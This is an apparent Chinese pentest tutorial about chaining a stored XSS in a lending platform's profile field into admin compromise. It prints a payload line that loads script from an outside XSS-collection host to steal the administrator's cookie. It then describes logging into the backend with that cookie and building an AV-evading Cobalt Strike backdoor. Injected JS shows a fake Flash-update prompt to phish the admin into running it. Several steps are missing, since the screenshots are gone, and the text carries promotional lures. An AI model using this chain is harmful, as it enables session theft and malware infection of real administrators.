简介
请注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
2021最新整理网络安全渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>关注我,私信回复“资料”获取<一
一、前言
网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码等,还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。
网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。
这篇主要演示如何利用XSS植入钓鱼,获得管理员内部电脑权限!
二、环境介绍
进入个人中心!
登录用户名密码后,普通用户界面!点击设置!
输入:
测试结果修改成功!查看下前端…
查看源代码-编辑后查看到没变动,XSS代码还是存在…说明存在XSS攻击
3、注册XSS平台
会弹出需要执行的XSS利用代码…选择标准代码测试!
</tExtArEa>’”><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
4、利用XSS漏洞
执行成功,那么XSS平台就收到了信息,可看到!
5、获取管理员cookie
点击提现…
当后台管理员访问管理界面,给客户结算资金的时候,点击提现申请模块!就会执行XSS植入的代码!!
这时候,就返回了管理员的cookie和URL信息!
6、cookie登录后台
将XSS平台获取XSS漏洞植入代码返回的包中,修改其中的url和cookie信息!
send执行后,通过cookie进入到了管理员后台!
在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面!
2、生成免杀后门
利用Cobal Strike生成C#语言的shell…
这是Flash贷款平台源码文件目录!!
将exe和js都上传到功能网服务器apache底层!测试访问可看到正常读取,确保内网管理员能执行XSS后访问到js文件,这里就可以开始了!
4、利用XSS漏洞植入JS
当”立即提交” 后直接执行了XSS植入的js文件,并提示了js中的内容!!
然后点确定后,直接跳转到flash页面!
和(三)中的方法一样,需要在后台管理页面也执行XSS,需要结算金额,让管理员去结算的时候点击执行XSS!
5、执行XSS下载flash
点击完成后,出现了您的 FLASH 版本过低,尝试升级后访问该页面!,一般情况下都会点击确认!
成功在kali攻击机上的CS上线,可看到获取到了管理员电脑的权限!!
网络安全渗透测试资料一>关注我,私信回复“资料”领取<一
五、总结
这里通过渗透中,找到了某平台的XSS漏洞,利用XSS漏洞植入代码执行,诱骗到了对方客服或者管理员的内网电脑权限!
其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免杀、CS4等等知识才可搭建!
那么很多人都说flash都是经典的钓鱼漏洞了,全国警惕性都会高很多,那么我还是老话,提供的是思路,如果是一个破解软件,一个购买网站,一个利用虚荣心或者是贪小便宜的购物页面,等等进行钓鱼,进行各类的植入的话,那有多少人会中招?
希望大家提高安全意识,没有网络安全就没有国家安全!
虽然基础,但是必须牢记于心。
